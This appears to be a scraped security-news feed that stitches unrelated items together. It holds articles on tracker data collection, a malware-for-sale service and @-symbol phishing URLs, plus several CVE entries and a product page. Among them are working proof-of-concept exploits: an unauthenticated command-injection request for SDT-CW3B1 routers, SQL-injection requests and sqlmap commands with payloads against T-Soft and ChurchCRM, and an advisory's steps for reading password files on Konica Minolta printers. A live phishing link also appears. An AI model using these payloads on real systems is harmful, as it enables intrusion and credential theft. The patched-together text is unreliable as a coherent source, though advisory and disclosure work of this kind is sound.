Data harvested without consent and before forms are submitted in many cases, researchers claim

Data harvested without consent and before forms are submitted in many cases, researchers claim

Email addresses typed into online forms are often handed over to web trackers before being submitted and without user consent, a systematic study by computer scientists has discovered.

Email addresses – or identifiers derived from them – are apparently being used by data brokers and advertisers for cross-site and cross-platform identification of computer users.

As part of an investigation into how data from online forms is used for tracking, a team of four computer scientists measured the extent of email and password collection prior to form submission by analyzing the top 100,000 websites.

Catch up on the latest privacy-related security news and analysis

The researchers – Asuman Senol from KU Leuven in the Netherlands, Mathias Humbert (University of Lausanne, Switzerland), and Gunes Acar and Frederik Zuiderveen Borgesius (both from Radboud University, Belgium) – compared results from two vantage points, in the US and EU, as well as between mobile and desktop browsers.

**Tracking domains**

The team found that email addresses were exfiltrated to tracking domains before form submission and without giving consent on 1,844 websites in the EU crawl and 2,950 websites in the US crawl.

In the majority of cases, data was extracted to well-known tracker domains, but the researchers also identified 41 tracker domains omitted from popular blocklists.

Profiling for ad-serving purposes is not the only concern.

The researchers also identified seemingly inadvertent password collection from 52 websites by third-party relay scripts.

A research paper (PDF) based on the study is due to be presented at the upcoming Usenix ’22 security conference.

INSIGHT Research has come a long way, but gaps remain – security researcher Artur Janc on the state of XS-Leaks

Web users typically enter their email addresses into online forms for reasons including signing up to a service or subscribing to a newsletter.

The research shows that any data entered into such forms may end up in the hands of data brokers – sometimes even in cases where individuals have second thoughts about signing up to something and didn’t hit ‘send’.

The researchers used an online crawler to systematically examine what happens when users close their session before submitting data entered on forms.

**GDPR violation concerns**

Although not a lawyer, Gunes Acar, one of the four main researchers on the project, told The Daily Swig that the behavior of some of the websites may be in violation of stricter data privacy regulations such as the European Union’s General Data Protection Regulation (GDPR).

“Surreptitious email exfiltration for tracking purposes may breach some GDPR principles such as transparency, purpose limitation, and legal basis, but we cannot say for certain whether individual websites violate the GDPR (or other laws) without looking at the specifics,” Acar explained.

Almost half of the websites contacted responded to the researchers’ GDPR-related requests (see response sample here).

“Some websites said they didn’t know that their visitors’ emails were collected by third parties, and they fixed the issue,” Acar said. “That was the most positive outcome.

“Other websites informed us how they were using the emails collected through this behavior,” they added.

**Countermeasures**

Privacy-conscious internet users might well recoil from the revelations, as summarized in a blog post featuring screen captures and videos.

Fortunately, some countermeasures are already available.

Acar explained: “Adblockers (e.g. uBlock Origin) and privacy-focused browsers (Brave, DuckDuckGo) block requests to tracker and advertising domains, and hence may prevent this type of data collection. Only blocking the cookies wouldn’t provide any protection.

“Email relay services may be used to avoid giving the same email address to different online and offline businesses. Apple, DuckDuckGo, and Mozilla offer such services, which can be used to generate alias addresses,” Acer concluded.

The researchers have developed a proof-of-concept browser plugin, LeakInspector, which informs users when their email and passwords are scraped from forms, in addition to blocking “leaky” requests to tracker domains.

“Unfortunately, the add-on is not available on Chrome Web Store, because it relies on APIs that Google disallows in Manifest v3,” Acar said. “We are working on publishing the add-on to Firefox’s add-on repository.”

RECOMMENDED Facebook account takeover: Researcher scoops $40k bug bounty for chained exploit

Popular websites leaking user email data to web tracking domains

GPAC 2.0.0 misuses a certain Unicode utf8_wcslen (renamed gf_utf8_wcslen) function in utils/utf.c, resulting in a heap-based buffer over-read, as demonstrated by MP4Box.

CVE-2022-30976: gpac/gpac.1 at 105d67985ff3c3f4b98a98f312e3d84ae77a4463 · gpac/gpac

SDT-CW3B1 version 1.1.0 suffers from a command injection vulnerability.

    # Exploit Title: SDT-CW3B1 1.1.0 - OS command injection# Date: 2022-05-12# Exploit Author: Ahmed Alroky# Author Company : AIactive# Version: 1.0.0# Vendor home page : http://telesquare.co.kr/# Authentication Required: No# CVE : CVE-2021-46422# Tested on: Windows# HTTP RequestGET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1Host: IP_HEREUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: */*Referer: http:// IP_HERE /admin/system_command.shtmlAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close

SDT-CW3B1 1.1.0 Command Injection

T-Soft E-Commerce version 4 suffers from a remote SQL injection vulnerability.

    # Exploit Title: T-Soft E-Commerce 4 - SQLi (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://www.tsoft.com.tr/# Version : v4# Tested on: Kali Linux# Category: WebApp# Google Dork: N/A# CVE: 2022-28132# Date: 18.02.2022######## Description ###############################################  Step-1: Login as Admin or with privilage user#  Step-2: Open burp or zap and request the {PoC REQUEST PATH} vulnerable path#  Step-3: Capture the request save as .txt#  Step-4: Run SQLMAP with this command 'sqlmap -r {req.txt} --dbs --level 5 --risk 3 --tamper=space2comment' --random-agent'#  Step-5: Now you're be able to see the dbs for more search 'how to use sqlmap advance'##  Impact: Attacker can see the what have in database and it's big impact and attacker can stole datas...# ########## Proof of Concept ########################################========>>> REQUEST <<<=========GET /Y/Moduller/_Urun/Json.php?_dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20 HTTP/2Host: domain.comCookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxx@xx.com; customDashboardMapping=true; countryCode=TR; rest1SupportUser=0; nocache=1; yayinlanmaDurumuPopup=1; yayinlanmaDurumuPopupTimeout=864000; PHPSESSID=fcfa85a5603de7b64bc08eaf68bc51ca; U_TYPE_CK=131; U_TYPE_OK=c16a5320fa475530d9583c34fd356ef5; TSOFT_LOGGED=7d025a34d0526c8896d713159b0d1ffe; email=; phone=; password=Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="98"X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Sec-Ch-Ua-Platform: "Linux"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://domain.com/srv/admin/products/products-v2/indexAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9=============> RESULTS OF THE SQLMAP <==========================Parameter: SatisAlt (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: _dc=1646232925144&sort=kayittarihi&dir=DESC&AramaKelimesi=&AramaKriteri=UrunAdi&SatisAlt=' AND 1331=1331 AND 'RcAU'='RcAU&SatisUst=&marka=&model=&tedarikci=&AlisAlt=&AlisUst=&KdvAlt=&KdvUst=&StokAlt=&StokUst=&birim=&extra=&kategori=&Kategori=&gor=0&ind=0&yeni=0&karsila=0&ana=0&grup=&firsat=0&mercek=0&kdvGoster=0&filtre=0&video=0&xml_not_update_price=0&xml_not_update_stock=0&multi_category_sort=0&simge=&desiAlt=&desiUst=&agirlikAlt=&agirlikUst=&stokBirim=&FirsatBaslamaTarihiBas=&FirsatBaslamaTarihiSon=&FirsatBitisTarihiBas=&FirsatBitisTarihiSon=&UrunEklemeTarihiBas=&UrunEklemeTarihiSon=&havaleAlt=&havaleUst=&page=1&start=0&limit=20---back-end DBMS: MySQL 5available databases [2]:[*] d25082_db[*] information_schema[13:05:31] [INFO] GET parameter 'SatisAlt' appears to be 'SQLite > 2.0 OR time-based blind (heavy query)' injectable

T-Soft E-Commerce 4 SQL Injection

The Skyoftech So Listing Tabs module 2.2.0 for OpenCart allows a remote attacker to inject a serialized PHP object via the setting parameter, potentially resulting in the ability to write to files on the server, cause DoS, and achieve remote code execution because of deserialization of untrusted data.

**So Listing Tabs – A powerful Responsive OpenCart 3.0.x & OpenCart 2.x module for professionally product listing**

So Listing Tabs OpenCart module arranges your products according to categories or product’s attributes: name, price, quantity, added date…And you are free to choose what categories, attributes to display. Each tabs is available with title and tab icon. You can choose whether to show the icon or not; set the width/height for the icon as well. Besides, the module support over 10 amazing effects for items appearing with ability of setting duration/delay time for the animation.

The friendly user interface of So Listing Tabs allows you totally manage all parameters of the module. You can set which categories or item’s fields to show. Besides, you are able to manage the way to display the items in the listing tabs with many useful options: title, description, created date… It can works well on any OpenCart themes.

**Note**: This module has been updated with new installation method, view more at: New Way to Install OpenCart Module

Are you interested in SO Listing Tabs module? Let’s preview the Demo now!

**MAIN FEATURES**

*   Support Opencart 2.0.x, 2.1.x, 2.2.x, 2.3.0.x & OC 3.x
*   Fully compatible with IE9+, Firefox 2+, Flock 0.7+, Netscape, Safari, Opera 9.5 and Chrome
*   Support Responsive layout
*   Support to open link in Same Window and New Window
*   Support Multi-Module in the same page
*   Allow to set number of column for each screen resolution
*   Allow to choose listing tabs as categories or item’s attributes
*   Allow to choose categories which you want to show
*   Allow to include or exclude products from child categories
*   Allow to set the number of child category levels to return
*   Allow to select ordering direction: Ascending/Descending.
*   Allow to set the number of products to display
*   Allow to choose Products Field which you want to show tabs
*   Allow to display tab All OR not
*   Allow to set the max length for category title
*   Allow to display category’s icon OR not
*   Allow to order category Name/Odering/Random
*   Allow to set width/height of category’s icon
*   Allow to display item attributes or not: title, description, created date
*   Allow to set the max length of item’s description can be showed
*   Allow to show/hide Product Image
*   Allow to set width/height of item’s image
*   Allow to select effect for item appearing
*   Allow to set how long animation will run
*   Allow to set a timer to delay the excution of the next item in the queue
*   Allow to set the content to show at the top and at the end of module

**CHANGELOG**

VERSION 2.2.3 for OC3 - Update - Released on October 04, 2019  

\[Update\] Add URL for Heading title of Module

\[Update\] Get demo data when configure the module without available data

  

Version 2.2.0: Updated on 20 July, 2017-----------
\[+\] Compatible with OpenCart 3.0.x

VERSION 2.1.0-Update - Released on Sep 16, 2016
+ Support RTL for Opencart version 2.3.0.x 

VERSION 2.1.0 - Released on Aug 16, 2016
+ Support Opencart version 2.3.0.x

VERSION 2.0.2 - Released on Jun 21, 2016 
+ Added Cache function 

VERSION 2.0.1 - Released on Apr 11, 2016
+ Fixed errors related to duplicate file and CSS style and 
+ Fixed error when using animate.css style 

VERSION 2.0.0 - Released on Mar 28, 2016
+ Support Opencart version 2.2.x

VERSION 1.0.7 - Released on Mar 8, 2016
- Updated structural display on the front-end
- Added post-text and pre-text 

VERSION 1.0.6 - Released on Dec 28, 2015
- Updated with js and module notification

VERSION 1.0.5 - Released on Dec 16, 2015
- Added more functions

VERSION 1.0.4 - Released on Dec 10, 2015
- Updated to directly upload the package in the admin panel

VERSION 1.0.3 - Released on Dec 05, 2015
- Upgraded to OpenCart 2.1 
- Added more functions

VERSION 1.0.1 -Released on Aug 22, 2015
+ Added more params: Show Title of Module, Module Class Suffix, Type Show, Row
+ Changed tab Effect Options

VERSION 1.0.0 -Released on Aug 05, 2015
- Initial release

CVE-2022-24108: Responsive OpenCart 3.0.x & OpenCart 2.x Module - So Listing Tabs

A one-stop shop for data and crypto kleptomaniacs

A one-stop shop for data and crypto kleptomaniacs

Malware that steals passwords, cookies, and payment card data from web browsers is being sold via a Telegram channel and a Tor website, security researchers have discovered.

Collectively named the ‘Eternity Project’ by its architects, the suite of malware already includes stealers, clippers, worms, miners, and ransomware, with a Distributed Denial of Service (DDoS) bot apparently under development.

A Telegram channel provides information about forthcoming software updates and videos documenting the malware’s functionality to around 500 subscribers.

Catch up on the latest malware news and attacks

“Interestingly, individuals who purchase the malware can utilize the Telegram Bot to build the binary,” according to a blog post by Cyble Research Labs.

“The TAs \[threat actors\] provide an option in the Telegram channel to customize the binary features, which provides an effective way to build binaries without any dependencies.”

**Versatile**

A Stealer module, which costs $260 for an annual subscription, also exfiltrates AutoFill data, tokens, history, and bookmarks from Chrome, Chromium, Firefox, Edge, Opera, and more than 20 other browsers.

Other data extracted from infected machine to the threat actor’s Telegram bot are various system credentials, and cryptocurrency via a wide range of crypto-wallets and browser cryptocurrency extensions.

Eternity ransomware, meanwhile, can encrypt documents, photos, and databases on disks, local shares, and USB drives on compromised machines.

The ransomware facility – the most expensive option at $490 – offers offline encryption, an encryption algorithm combining AES and RSA, and the option to set a time limit after which files cannot be decrypted.

The Eternity worm, priced at $390, propagates through infected machines via local files and local network shares; Google Drive, OneDrive, and DropBox; and Discord, Telegram, and Python Interpreter.

For $110, budding cybercrooks can harness clipper malware that supports multiple address formats for BTC, LTC, ZEC, and BCH, while a $90-a-year cryptocurrency mining module offers silent Monero mining and automatic restarts.

**Cybercrime increase**

Researchers suspect the developer behind the Eternity Project is repurposing code in the ‘DynamicStealer’ GitHub repository, and have identified possible links with the threat actor behind the Jester Stealer malware Cyble documented in February.

Cyble Research Labs said it had recently “observed a significant increase in cybercrime through Telegram channels and cybercrime forums”.

Individuals and organizations are advised to protect themselves by installing reputable security software, enabling automatic software updates if practicable, regularly backing up data and keeping backups offline or on a separate network, and refraining from opening untrusted links and email attachments without verifying their authenticity.

YOU MIGHT ALSO LIKE Researcher stops REvil ransomware in its tracks with DLL-hijacking exploit

‘Eternity malware’ offers Swiss Army knife of cybercrime tools

A little-used feature of web addresses is being used to obfuscate malicious phishing URLs.
The post Long lost @ symbol gets new life obscuring malicious URLs appeared first on Malwarebytes Labs.

Threat actors have rediscovered an old and little-used feature of web URLs, the innocuous @ symbol we usually see in email addresses, and started using it to obscure links to their malicious websites.

Researchers from Perception Point noticed it being used in a cyberattack against multiple organization recently. While the attackers are still unknown, Perception Point traced them to an IP in Japan.

The attack started with a phishing email pretending to be from Microsoft, claiming the user has messages that have been embargoed as potential spam. (Using familiar, transactional messages from well-known brands like Microsoft has become a popular tactic for scammers, as a way to defeat spam filters and keen-eyed users.)

The message reads:

    You have new 5 held messages.
    
    You can release all of your held messages and permit or block future emails the senders, or manage messages individually.

If the recipient clicks any of the links in the email, they are directed to a phishing page made to look like an Outlook login page.

If the recipient follows the often-repeated advice to hover their pointer over the links before clicking them, to see where they go, they will see this weird-looking URL, and probably be none the wiser:

https://$%^&;\*\*\*\*((@bit.ly/3vzLjtz#ZmluYW5jZUBuZ3BjYXAuY29t

This is almost certainly designed to bamboozle users, but to your computer it looks fine. As weird as this URL appears, it is actually valid and acceptable, and your browser will happily parse it for you.

Users who clicked on the link were passed through a chain of redirects before ending up at a phishing page that looks like the Outlook login screen.

The phishing site is a copy of the Outlook login page

**Reading the URL**

As weird as it looks, the URL in this phishing campaign sticks to the rules of what’s allowed in a web address. The part you see least often is the @ symbol. RFC 3986 refers to anything after https:// and before the @ symobl, highlighted below, as userinfo. This part of the URL is for passing authentication information like a username and password, but it is very rarely used, and is simply ignored as a so-called “opaque string” by many systems.

https://**$%^&;\*\*\*\*((@**bit.ly/3vzLjtz#ZmluYW5jZUBuZ3BjYXAuY29t

The last part of the URL after the # is also ignored when you click the link. This is called the fragment identifier and it represents a piece of the destination page. The browser might use it to scroll to a section of the destination page, or it might be used to pass information to the destination page, but it plays no part in determining what the destination actually is.

https://bit.ly/3vzLjtz**#ZmluYW5jZUBuZ3BjYXAuY29t**

In this case the fragment ID—ZmluYW5jZUBuZ3BjYXAuY29t—appears to be a unique ID that identifies the email address the phish was sent to. If it’s removed, the link works but when you reach the final destination it simply shows a loading icon, perhaps to hide the site’s true intentions to accidental visitors or researchers.

What we are left with when we remove the parts that of the link that are ignored by the browser is a very ordinary-looking bit.ly link. Exactly the kind of thing you might think is suspicious in an email that says it’s from Microsoft.

https://bit.ly/3vzLjtz

As you probably know, bit.ly is a URL shortening service. The bit.ly link redirects users to another URL, likely used for tracking, which itself redirects users to the phishing page.

**Does your browser support the @ symbol?**

If you are one of the 2.6 billion people using Chrome, the answer is “yes”, URLs that use the @ symbol work in Chrome and other Chromium-based browsers such as Vivaldi, Brave, and Microsoft Edge.

The latest version of Microsoft’s Internet Explorer doesn’t parse URLs with the @ delimiter though.

Firefox and Firefox-based browsers, such as Tor and Pale Moon, are also affected.

And what about Safari?

According to Thomas Reed, Malwarebytes’ Director of Mac and Mobile, “This technique appears to work in Safari and all other major Mac browsers. Firefox will show a warning when attempting to visit such a link. Unfortunately, Safari—the most popular browser on macOS—does not display a warning and opens the link without objection, as does Chrome.”

Reed also points out that email software will often look for URLs in plain text emails and convert them to clickable links, but the @ symbol seems to prevent this. According to Reed: “The URL used by the phishing campaign does not become a clickable link by itself.” The links will still work in HTML emails, so this isn’t much of a barrier, just a feather in the cap of hold outs who insist on viewing their emails in plain text!

The wide support for the confusing and little-used @ symbol could see it used more widely. In a Threat Post interview, Perception Point’s Vice President of Customer Success and Incident Response, Motti Elloul, predicted that this won’t be the last time we’ll see phishing attacks taking advantage of it.

“The technique has the potential to catch on quickly, because it’s very easy to execute,” he said. “In order to identify the technique and avoid the fallout from it slipping past security systems, security teams need to update their detection engines in order to double check the URL structure whenever @ is included.”

Long lost @ symbol gets new life obscuring malicious URLs

A use-after-free issue exists in Chrome 100 and earlier versions. A malicious extension can achieve arbitrary code execution in the browser process.

Chrome 100 extensions::ExtensionApiFrameIdMap::GetFrameId Heap Use-After-Free

Konica Minolta bizhub MFP devices before 2022-04-14 have an internal Chromium browser that executes with root (aka superuser) access privileges.

Title

Sandbox Escape with Root Access & Clear-text passwords

Product

Multiple Konica Minolta bizhub MFP Printer Terminals

Vulnerable Version

see vulnerable / tested versions below

Fixed Version

see solution section below

CVE Number

CVE-2022-29586, CVE-2022-29587, CVE-2022-29588

By

Werner Schober (Office Vienna) Johannes Kruchem (Office Vienna) SEC Consult Vulnerability Lab

Multiple Konica Minolta MFP bizhub devices, as well as devices from other manufacturers with the same firmware, are vulnerable to a sandbox breakout via the internal browser that displays the help menus. The browser itself is started with root privileges, which allows access to the complete file system. A file in the file system contained the administrator password for the printer's web interface in plain text.

**Vendor description**

_"Konica Minolta is a Japanese multinational technology company headquartered in Marunouchi, Chiyoda, Tokyo, with offices in 49 countries worldwide. The company manufactures business and industrial imaging products, including copiers, laser printers, multi-functional peripherals (MFPs) and digital print systems for the production printing market. Konica Minolta's Managed Print Service (MPS) is called Optimised Print Services. The company also makes optical devices, including lenses and LCD film; medical and graphic imaging products, such as X-ray image processing systems, colour proofing systems, and X-ray film; photometers, 3-D digitizers, and other sensing products; and textile printers."_ 

Source: https://en.wikipedia.org/wiki/Konica\_Minolta 

**Business recommendation**

Konica Minolta provided a patch of the firmware and operating system very quickly at the start of the year 2020. For most of the devices this firmware update must be manually applied by service technicians as a remote service platform for remote firmware updates is not fully rolled out yet. Multiple COVID-19 lockdowns delayed this patching process of over hundreds of thousands of devices drastically. 

In case you didn't receive an update yet, approach your Konica Minolta contact. 

SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues. Furthermore, it is necessary to implement secure software design early in the development life cycle and adapt secure patch management procedures through an ISMS. 

SEC Consult also published a blog post titled "**Someone call the patch manager - how COVID-19 left hundreds of thousands of printers vulnerable**" containing a practical example of a possible attack vector. 

**Vulnerability overview/description****1) Sandbox Escape on the Physical Printer Touch Screen Terminal (CVE-2022-29586) **

A touch screen terminal is attached to the printer in order to manage print jobs, create new scans, simply copy a page or to configure the device. The touch screen terminal hosts a user interface, which is based upon a proprietary application. 

By opening certain applications and/or settings via the terminal, it was possible to observe a slight change in the look and feel of the user interface itself. It was quickly determined that this was the result of context change, meaning that the applications running are not solely based on the proprietary application only. 

After attaching a keyboard to one of the multiple USB ports of the printer and pressing specific key combinations, it was possible to determine that some application parts are running an ordinary Chromium browser in "kiosk mode", which can be escaped easily, although most of the key combinations were blacklisted. This allows an attacker to get full access to the underlying printer's operating-  and file system, including configuration files, passwords in clear text, proprietary scripts and many more. 

**2) Terminal UI/Chromium running as root (CVE-2022-29587) **

It was determined that the printer UI and the Chromium browser are running with root privileges after escaping the printer terminal's sandbox. This allows an attacker to get full access to all files and folders on the operating system.  

**3) Passwords stored in clear text on the file system (CVE-2022-29588) **

Multiple passwords in clear-text were found on the file system of the printer. 

This includes: 

*   Unix User Account Passwords 
*   Printer Administrative Passwords 

Examples can be found in the following proof of concept section.  

**Proof of concept**

The referenced screenshots in this advisory can be found in our blog post.

**1) Sandbox Escape on the Physical Printer Touch Screen Terminal (CVE-2022-29586)  **

The following steps are necessary to get full access to the printer's operating system. It is necessary to have physical access to the device and "User Authentication" must be used and "Public User Access" must be enabled on the device.   

**Step 1 - Public User Access **

The attacker has access as "Public User" to the device.  The button is marked red in "step1.jpg". 

**Step 2 - Utility **

An attacker has to click on the button called "Utility" in the user interface which should be open after step 1. The button is marked red in "step2.jpg". 

**Step 3 - Utility again **

An attacker has to click on the slightly different "Utility" button again in the next window. The button is marked red in "step3.jpg". 

**Step 4 – Accessing Chromium **

A slight change in the design of the user interface can be observed after clicking on the "Utility" button marked red in the step above. The reason for that is that the application, which is now visible, is launched inside of a Chromium browser in kiosk mode. The loaded web application in Chromium can be seen in image "step4.jpg". 

**Step 5 – Attaching a keyboard **

A keyboard has to be attached to the printer to breakout of the terminal's sandbox and get access to the operating system. This can be done directly via the USB port available on all printers. 

**Step 6 – Access Chromium Developer Console **

Most of the shortcuts available on a normal Linux operating system are blocked or crash the printer terminal, but it was still possible to get full access to the system by pressing the key F12, which opened up the Chromium developer console. This can be seen in "step6.jpg". 

**Step 7 – Accessing the file system **

The tab sources in the Chromium developer tools can be used to get full file system access. Arbitrary folders can be added and read by clicking on "Add folder to workspace".

For example, the folder /var/log/nginx/html/ got added to Chromium, which revealed a lot of interesting files. The probably most interesting one is the file called "ADMINPASS" containing the printer's administrator account password in cleartext. 

**2) Terminal UI/Chromium running as root  (CVE-2022-29587)  **

Files such as /etc/shadow can be accessed with the root user's permissions. 

**3) Passwords stored in clear text on the file system  (CVE-2022-29588)  **

The following files containing clear text passwords were identified on the printer's file system: 

**3.1) /etc/shadow **

The shadow file contained the password of the user ORDBMS. No passwords were set for other users. 

**3.2) /var/log/nginx/html/ADMINPASS **

This file contains the password for the printer's web interface. Another file with sensitive content was found in /var/log/nginx/html. The "ADMINPASS" file contained the administrator's password for the printer's terminal/web interface in clear text. 

**Vulnerable / tested versions**

According to Konica Minolta, 46 bizhub MFP models are affected. The number of affected  devices in the field are in the hundreds of thousands worldwide according to the vendor.  These devices are also re-branded and sold by other companies. 

The vulnerabilities have been tested on the following devices: 

*   C3350i 
*   C3300i 

**Konica Minolta provided the following list of affected models / versions: **

​Model name

Affected FW version

CVE-ID

bizhub 227, 287, 367, 308, 368, 458, 558, 758, 808, 958, PRO958, 308e, 368e, 458e, 558e, 658e, 4752, 4052, C227, C287, C258, C308, C368, C458, C558, C658, C659, C759, C3351, C3851, C3851FS

G00-U8 or later

CVE-2022-29586 CVE-2022-29587

bizhub C450i, C550i, C650i

G00-73 or later

CVE-2022-29586 CVE-2022-29587

bizhub C250i, C300i, C360i, C4050i, C3350i, C4000i, C3300i

G00-73 or later

CVE-2022-29586 CVE-2022-29587

bizhub C250i, C300i, C360i, C4050i, C3350i, C4000i, C3300i

Gxx-4A or prior

CVE-2022-29586 CVE-2022-29587 CVE-2022-29588

bizhub 306i, 226i, 246i, 266i, C3320i

Gxx-4A or prior

CVE-2022-29588 CVE-2022-29587 CVE-2022-29586

**Vendor contact timeline:**

2020-01-16

Contacting vendor through "KONICA MINOLTA PSIRT Vulnerability Report Form"

2020-01-16

Vendor responds with GPG public key for psirt@konicaminolta.com

2020-01-16

Forwarding encrypted advisory to Konica Minolta PSIRT

2020-01-29

Update from Konica Minolta PSIRT - The reported vulnerabilities were successfully reviewed and will be patched in a future firmware release. The release date will be provided soon.

2020-2022

Postponing release multiple times as the remote service platform for remote firmware updates has not been rolled out for most devices yet and hundreds of thousands of printers have to be patched manually on-site during the COVID-19 pandemic.

2022-04-13

Requesting status update from Konica Minolta PSIRT.

2022-04-14

Konica Minolta PSIRT responds by stating that all devices directly affected have already been patched.

2022-04-25

Sending security advisory draft to vendor for review.

2022-05-09

Konica Minolta provides a list of affected models and feedback.

2022-05-10

Receiving further feedback, adjusting advisory.

2022-05-12

Coordinated release of security advisory

**Solution**

Konica Minolta already provided a patch of the firmware and operating system at the start of the year 2020 that must be applied by service technicians manually on-site at all of their customer locations. Most affected devices don't have a remote service platform for remote firmware updates yet. If your service technician hasn't patched your system yet, schedule an appointment. 

It has to be noted that Konica Minolta tried to patch most of their printers as soon as possible, which is not an easy task due to the large amount of affected printers and their manual procedure during the COVID-19 pandemic with multiple lockdowns. 

Konica Minolta provided the following list of models with fixed FW versions: 

Model name

Fixed FW version

bizhub 227, 287, 367, 308, 368, 458, 558,758, 808, 958, PRO958, 308e, 368e, 458e,558e, 658e, 4752, 4052, C227, C287, C258, C308, C368, C458, C558, C658, C659, C759,C3351, C3851, C3851FS

GC2-X4 or later

bizhub C550i, C650i

G00-2B or later

bizhub C250i, C450i, C300i, C360i, C4050i, C3350i, C4000i, C3300i

G00-7B or later

bizhub C3320i

G00-4D or later

bizhub 306i, 226i, 246i, 266i

G00-4F or later

**Workaround**

The following hardening/workaround is available and was provided directly from Konica Minolta. 

*   Disable the use of the external USB keyboard by "Customer Administrator" setting. 
*   In addition, it is strongly recommended to change the Customer Admin password to a new one. 

**Advisory URL**

https://sec-consult.com/vulnerability-lab/ 

EOF Werner Schober, Johannes Kruchem / @2022 

_Interested to work with the experts of SEC Consult? Send us your application_

_Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices_

CVE-2022-29587: Sandbox Escape with Root Access & Clear-text passwords in Konica Minolta bizhub MFP Printer Terminals

A SQL injection vulnerability exists in ChurchCRM version 2.0.0 to 4.4.5 that allows an authenticated attacker to issue an arbitrary SQL command to the database through the unsanitized EN_tyid, theID and EID fields used when an Edit action on an existing record is being performed.

*   Sat, May 14, 2022
*   4-minute read

**Summary**

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    

    Product:                   Church Web CRM
    Manufacturer:              ChurchCRM
    Affected Version(s):       ChurchCRM 2.0.0 <= 4.4.5 
    Tested Version(s):         4.4.5
    Vulnerability Type:        SQL Injection (CWE-89) 
    Risk Level:                High
    Solution Status:           Unfixed
    Manufacturer Notification: 2021-09-16
    Solution Date:             n/a
    Public Disclosure:         2022-05-14
    CVE Reference:             CVE-2021-41965
    Author of Advisory:        Alexander Bilz
    

**Overview**

The manufacturer describes the product as follows (see 1):

> “An OpenSource CRM System Built for Churches. Your Church can benefit from giving your staff and volunteers the tools they need to make every interaction more valuable.”

The software comes with an abundance of features relevant to churches and managing a congregation. Among others it allows to conduct:

*   Conduct Fundraisers
*   Manage Church Members
*   Publish Events
*   Manage Sunday Schools

The source code can be found on ChurchCRM’s GitHub account 2.

ChurchCRM is vulnerable to SQL injection attacks due to a lack of input validation and no additional protection mechanisms.

**Vulnerability Details**

Church CRM allows its users to schedule church events, such as church services, Sunday school or summer camps. Once an event has been created it can also be edited and deleted again through the events page.

Hereby, it was detected that the parameter EID, which is sent along when editing an existing entry, is susceptible to an SQL injection attack. On edit, data is posted to the EventEditor.php where it is executed on the database.

Similarly, the EN_tyid parameter of the EditEventTypes.php and theID of the EventNames.php endpoint can be abused for injecting arbitrary SQL queries.

Different types of SQL injection techniques can be applied, including:

*   Boolean-based blind
*   Time-based blind

The vulnerable functionality is only accessible when authenticated.

**Proof of Concept (PoC)**

As a proof of concept, the EN\_tyid parameter, which is sent when an event is edited, will be abused to query the database management system using sqlmap 3.

Let’s start with the HTTP request I had captured in Burp Suite.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    

    POST /churchcrm/EditEventTypes.php HTTP/1.1  
    Host: <IP>  
    Content-Length: 21  
    Cache-Control: max-age=0  
    Upgrade-Insecure-Requests: 1  
    Origin: http://<IP> 
    Content-Type: application/x-www-form-urlencoded  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36  
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
    Referer: http://<IP>/churchcrm/EventNames.php  
    Accept-Encoding: gzip, deflate  
    Accept-Language: en-US,en;q=0.9  
    Cookie: <Cookie Value>  
    Connection: close  
    EN_tyid=4&Action=Edit
    

This request could then be passed to sqlmap for injecting the EN_tyid parameter.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    

    ┌──(kali㉿kali)-[~/ChurchCRM] 
    └─$ sqlmap -r churchcrm.txt -p EN_tyid -dbs 
            ___ 
           __H__                                                                  
     ___ ___[,]_____ ___ ___  {1.5.5#stable}                                      
    |_ -| . [.]     | .'| . |                                                     
    |___|_  [)]_|_|_|__,|  _|                                                     
          |_|V...       |_|   http://sqlmap.org                                   
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program 
    [*] starting @ 10:42:27 /2021-09-16/ 
    [10:42:27] [INFO] parsing HTTP request from 'churchcrm.txt' 
    [10:42:28] [INFO] resuming back-end DBMS 'mysql'  
    [10:42:28] [INFO] testing connection to the target URL 
